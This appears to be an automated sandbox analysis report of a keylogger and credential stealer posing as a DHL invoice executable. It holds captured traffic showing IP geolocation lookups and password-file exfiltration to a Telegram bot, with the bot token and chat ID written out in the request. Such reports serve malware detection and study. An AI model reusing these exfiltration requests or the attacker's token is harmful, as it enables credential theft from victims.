Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:22 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-02 12:45:22 UTC | 865 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:22 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1136711
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0RmQ41ugpCUt%2FFDGbjHKNDPjXYTyKyV4lTDHq%2FbTD5qz5%2BYmr3Hg9hlfsxFF1cuNIIHGg0PpD4rMXk%2FE1Ksu%2FJBt31QHUctofSugNk%2BVYqZm3xSre8h%2FQM3zlAh6O6%2BxfLz7AaeD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbad8869bb5de94-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1444&rtt_var=567&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1887524&cwnd=231&unsent_bytes=0&cid=3de3b8967b2f5499&ts=149&x=0"
2025-01-02 12:45:22 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49807 | 188.114.97.3 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:36 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-02 12:45:36 UTC | 863 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:36 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1136725
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gox0%2FgNjDCB95rkzvotqZ0nYqGEQi6kZT57IVCpohLYfT0EgAIoR%2FhHu3Zq2NPd7QV9jjmUIFWYXxQf%2Bx2JNU3uu7F6aerp9KvHnof0FjITGXjUh%2BpAe5ppuGUGe%2FfYy%2F0h%2BOA9N"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbad8e11d290f46-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1718&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1616832&cwnd=229&unsent_bytes=0&cid=03562a205d885bec&ts=165&x=0"
2025-01-02 12:45:36 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49818 | 188.114.97.3 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:38 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-02 12:45:38 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:38 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1136727
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EyLzS1hdj5UOrk%2FoFIAoFj7%2FiOWmZCPoSx2nVeHW71TZf9fW%2Bcp6SU7sRvyIEer3%2BiUKRkKP7%2Blovl81e5t9nUKhBd167JZfU134i5BmQmWj0LRrexW8aEeq8GBHqObtSaNgAR5q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbad8e90dfc0f53-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1569&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=193&unsent_bytes=0&cid=eaac95aa924bc821&ts=142&x=0"
2025-01-02 12:45:38 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49825 | 188.114.97.3 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:39 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-02 12:45:39 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:39 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1136728
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5mmOkQS2LxJRZBuLjKcaFSO8WHXPbmS%2BATHWM%2BdzUUa9ijtGyraBcCQh%2F5rc02faaHqVx2AkZTakJryArRh1wvjUPA0kh0hPYXYIQntG6kWq1fx4kCk1zttvc9ufn%2F38Pef46NmA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbad8f0cc9a43d7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1442687&cwnd=212&unsent_bytes=0&cid=89a2b521284ad6e7&ts=139&x=0"
2025-01-02 12:45:39 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49841 | 188.114.97.3 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:42 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-02 12:45:42 UTC | 863 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:42 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1136731
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKDN4UsAPkOL%2FxccZDG9CbqJfCny%2FCJj5dnfdgEx3xVcvOLKVRy5l1p%2BfPVvM7r%2Bc%2BdAvM3AcMy5CjFsjM%2BKq7m9PQnLIBF7rHiwAeLzbFM5YDbAf%2F41lUrgMBCkbHuMdsAATNFe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbad9031ceaefa1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1948&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=165&unsent_bytes=0&cid=28368d351a19fcf6&ts=132&x=0"
2025-01-02 12:45:42 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49868 | 149.154.167.220 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:46 UTC | 334 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2004/01/2025%20/%2001:55:27%0D%0ACountry%20Name:%20%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-02 12:45:46 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Thu, 02 Jan 2025 12:45:46 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-02 12:45:46 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49879 | 149.154.167.220 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:47 UTC | 346 | OUT | POST /bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2c94d88c6ec6
Host: api.telegram.org
Content-Length: 580
2025-01-02 12:45:47 UTC | 580 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 63 39 34 64 38 38 63 36 65 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 36 34 32 32 39 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 32 2f 30 31 2f 32 30 32 35 20 2f 20 30 37 3a 34 35 3a 30 32
Data Ascii: --------------------------8dd2c94d88c6ec6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:642294Date and Time: 02/01/2025 / 07:45:02
2025-01-02 12:45:48 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 02 Jan 2025 12:45:48 GMT
Content-Type: application/json
Content-Length: 543
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2025-01-02 12:45:48 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 32 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 38 39 36 38 39 34 37 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 61 72 72 79 73 74 61 72 5f 62 6f 74 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 72 72 79 35 73 74 61 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 36 30 34 37 35 33 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 61 69 72 72 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 61 69 72 72 79 6d 6f 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 38 32
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":25291,"from":{"id":7289689475,"is_bot":true,"first_name":"Barrystar_bot1","username":"barry5star_bot"},"chat":{"id":7360475312,"first_name":"Bairry","last_name":"Moe","username":"Bairrymoe","type":"private"},"date":173582



Target ID:0
Start time:07:44:59
Start date:02/01/2025
Path:C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
Imagebase:0x330000
File size:1'106'432 bytes
MD5 hash:49A44E1BD7AE31824843C4316F35EB35
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hooking, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:low
Has exited:true

Target ID:2
Start time:07:45:02
Start date:02/01/2025
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
Imagebase:0xd30000
File size:45'984 bytes
MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:false

Execution Graph

Execution Coverage:3.1%
Dynamic/Decrypted Code Coverage:1.3%
Signature Coverage:5%
Total number of Nodes:1999
Total number of Limit Nodes:51
3656c4 7 API calls 2 library calls 96476->96526 96477->96485 96530 35f2d9 20 API calls __dosmaperr 96477->96530 96478->96484 96525 365891 8 API calls 2 library calls 96480->96525 96481->96477 96486 365bd2 96481->96486 96484->96477 96484->96485 96491 365c45 96484->96491 96532 350a8c 96485->96532 96524 3657a3 7 API calls 2 library calls 96486->96524 96488 365be0 96488->96484 96490 365c8e 96531 35f2c6 20 API calls __dosmaperr 96490->96531 96494 365c60 96491->96494 96495 365c4c 96491->96495 96529 35f2a3 20 API calls 2 library calls 96494->96529 96527 35f2d9 20 API calls __dosmaperr 96495->96527 96498 365c51 96528 35f2c6 20 API calls __dosmaperr 96498->96528 96500->96427 96501->96432 96502->96442 96503->96444 96504->96432 96505->96431 96506->96436 96507->96432 96509 36f89b __fread_nolock 26 API calls 96508->96509 96510 36565e 96509->96510 96511 365663 96510->96511 96539 362d74 38 API calls 3 library calls 96510->96539 96511->96467 96511->96468 96513 365686 96513->96511 96514 3656a4 GetConsoleMode 96513->96514 96514->96511 96515->96456 96516->96460 96517->96485 96518->96462 96519->96469 96520->96485 96521->96463 96522->96484 96523->96484 96524->96488 96525->96488 96526->96488 96527->96498 96528->96485 96529->96485 96530->96490 96531->96485 96533 350a95 96532->96533 96534 350a97 IsProcessorFeaturePresent 96532->96534 96533->96455 96536 350c5d 96534->96536 96540 350c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96536->96540 96538 350d40 96538->96455 96539->96513 96540->96538 96549 368585 96541->96549 96543 36862b 96543->96416 96544->96408 96545->96416 96546->96413 96547->96417 96548->96416 96550 368591 CallCatchBlock 96549->96550 96560 365147 EnterCriticalSection 96550->96560 96552 36859f 96553 3685c6 96552->96553 96554 3685d1 96552->96554 96561 3686ae 96553->96561 96576 35f2d9 20 API calls __dosmaperr 96554->96576 96557 3685cc 96577 3685fb LeaveCriticalSection __wsopen_s 96557->96577 96559 3685ee __fread_nolock 96559->96543 
96560->96552 96578 3653c4 96561->96578 96563 3686c4 96591 365333 21 API calls 3 library calls 96563->96591 96565 3686be 96565->96563 96566 3686f6 96565->96566 96568 3653c4 __wsopen_s 26 API calls 96565->96568 96566->96563 96569 3653c4 __wsopen_s 26 API calls 96566->96569 96567 36871c 96571 36873e 96567->96571 96592 35f2a3 20 API calls 2 library calls 96567->96592 96572 3686ed 96568->96572 96570 368702 CloseHandle 96569->96570 96570->96563 96573 36870e GetLastError 96570->96573 96571->96557 96575 3653c4 __wsopen_s 26 API calls 96572->96575 96573->96563 96575->96566 96576->96557 96577->96559 96579 3653e6 96578->96579 96580 3653d1 96578->96580 96585 36540b 96579->96585 96595 35f2c6 20 API calls __dosmaperr 96579->96595 96593 35f2c6 20 API calls __dosmaperr 96580->96593 96583 3653d6 96594 35f2d9 20 API calls __dosmaperr 96583->96594 96585->96565 96586 365416 96596 35f2d9 20 API calls __dosmaperr 96586->96596 96587 3653de 96587->96565 96589 36541e 96597 3627ec 26 API calls _strftime 96589->96597 96591->96567 96592->96571 96593->96583 96594->96587 96595->96586 96596->96589 96597->96587 96598 333156 96601 333170 96598->96601 96602 333187 96601->96602 96603 3331eb 96602->96603 96604 33318c 96602->96604 96642 3331e9 96602->96642 96606 3331f1 96603->96606 96607 372dfb 96603->96607 96608 333265 PostQuitMessage 96604->96608 96609 333199 96604->96609 96605 3331d0 DefWindowProcW 96629 33316a 96605->96629 96612 3331f8 96606->96612 96613 33321d SetTimer RegisterWindowMessageW 96606->96613 96657 3318e2 10 API calls 96607->96657 96608->96629 96610 3331a4 96609->96610 96611 372e7c 96609->96611 96616 3331ae 96610->96616 96617 372e68 96610->96617 96671 39bf30 34 API calls ___scrt_fastfail 96611->96671 96620 333201 KillTimer 96612->96620 96621 372d9c 96612->96621 96618 333246 CreatePopupMenu 96613->96618 96613->96629 96615 372e1c 96658 34e499 42 API calls 96615->96658 96623 3331b9 96616->96623 96634 372e4d 96616->96634 96646 39c161 96617->96646 96618->96629 96653 3330f2 
Shell_NotifyIconW ___scrt_fastfail 96620->96653 96625 372dd7 MoveWindow 96621->96625 96626 372da1 96621->96626 96630 3331c4 96623->96630 96631 333253 96623->96631 96624 372e8e 96624->96605 96624->96629 96625->96629 96632 372da7 96626->96632 96633 372dc6 SetFocus 96626->96633 96630->96605 96659 3330f2 Shell_NotifyIconW ___scrt_fastfail 96630->96659 96655 33326f 44 API calls ___scrt_fastfail 96631->96655 96632->96630 96637 372db0 96632->96637 96633->96629 96634->96605 96670 390ad7 22 API calls 96634->96670 96635 333214 96654 333c50 DeleteObject DestroyWindow 96635->96654 96656 3318e2 10 API calls 96637->96656 96640 333263 96640->96629 96642->96605 96644 372e41 96660 333837 96644->96660 96647 39c179 ___scrt_fastfail 96646->96647 96648 39c276 96646->96648 96672 333923 96647->96672 96648->96629 96650 39c25f KillTimer SetTimer 96650->96648 96651 39c1a0 96651->96650 96652 39c251 Shell_NotifyIconW 96651->96652 96652->96650 96653->96635 96654->96629 96655->96640 96656->96629 96657->96615 96658->96630 96659->96644 96661 333862 ___scrt_fastfail 96660->96661 96743 334212 96661->96743 96665 373386 Shell_NotifyIconW 96666 333906 Shell_NotifyIconW 